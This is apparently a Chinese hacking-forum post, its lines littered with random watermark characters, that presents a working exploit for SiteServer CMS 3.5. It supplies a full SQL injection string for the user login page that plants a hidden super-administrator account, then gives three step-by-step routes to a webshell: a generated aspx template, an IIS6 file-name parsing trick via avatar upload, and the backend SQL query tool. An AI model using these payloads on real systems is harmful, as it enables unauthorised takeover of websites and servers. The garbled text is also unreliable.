经测试秒杀最新的3.5版" E) O6 @1 g5 h. L1 v: e3 P' K$ K: C
; \$ s0 [8 g7 Lstieserver官网:www.siteserver.cn; u3 h/ @: i' k3 Y/ a0 G) E
+ g/ T( H$ q6 i& M8 z
% _1 M3 \7 L; O- \
- @. E* ^; t% Q$ ~
EXP:1 c; f( I4 c& x
- Z- P1 }/ u+ P4 c4 s0 H8 u+ @
直接访问UserCenter/login.aspx* S: L F9 y% `7 T1 b; y
! M. E, }! Z( I# l ; z. \6 y9 k( w1 _% b
9 m: j; e' x& E4 j用户名处输入:
) I3 T7 Y0 a0 _8 m h2 s3 j
2 Z% }9 t% j4 E2 @: ]. W123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
" R) J1 ~# B6 S. y; n2 V. M+ B$ l1 A+ Z9 L4 r0 Z
* l, L/ X2 s, H @0 A
! }2 u: Y& A% Y6 a7 J密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。+ E2 ~, }1 G0 u8 }5 [
1 u9 d+ `2 Q. a X7 e/ V
) O P3 r, |6 Y+ ~
* h! t0 [" d X" g
之后再访问后台SiteServer/login.aspx用插入的用户登陆3 X0 P) Q, X8 i- C, C+ m
7 Y5 |1 m }0 ]) S( r
6 A: I5 _. }+ Q/ W. f) E/ B V* Y# C+ r' b4 |# ^! ]+ W0 i/ D5 H
后台拿webshell的三种方法:
. E4 k0 @& G: Y$ F5 m: B
0 j3 v4 }, B' ^2 m. v! y1 F7 S一、
% r! D, l" s1 C
, f; m1 P( W, _' N7 R1 W7 G0 ~站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx- ^# E4 p# z! s& r) X- W K
" M- o: e+ J1 v% s
二、
% i- J0 c _8 a' ^0 o
" U p$ V9 M, K1 `成员权限-》添加用户-》用户名为:1.asp& N3 v( z9 q( q# |$ u
2 t0 b" d' E; U' Rhttp://127.0.0.1/usercenter/
Z! z" P9 m8 C7 N; ]
+ h* T& W* J0 e% V- s: {8 @1 y) F用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell$ b6 |6 w: y1 P4 V$ H
( f+ m. r& ~3 V C
(ps:后台添加用户时不会验证是否含有非法字符)5 M" _7 d" h: L
' \& u: |7 x o/ B+ A三、
% }. N" b& Q9 J/ O; z
# u/ f. @) L+ S' L* `. w( H( n系统工具-》实用工具-》机器参数查看8 C' s$ }1 U- z, [( ~0 Y4 x: I
可以看到数据库类型、名称,WEB路径
9 F; M9 f- x3 C9 ?" {! q
" p {. F3 a% T& T P系统工具-》数据库工具-》SQL语句查询2 d4 v" h+ [8 s# u& Z1 j5 _
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。/ r4 @1 B7 K% m
7 o' A' h- Z" N2 u. F) ^2 C, |" P |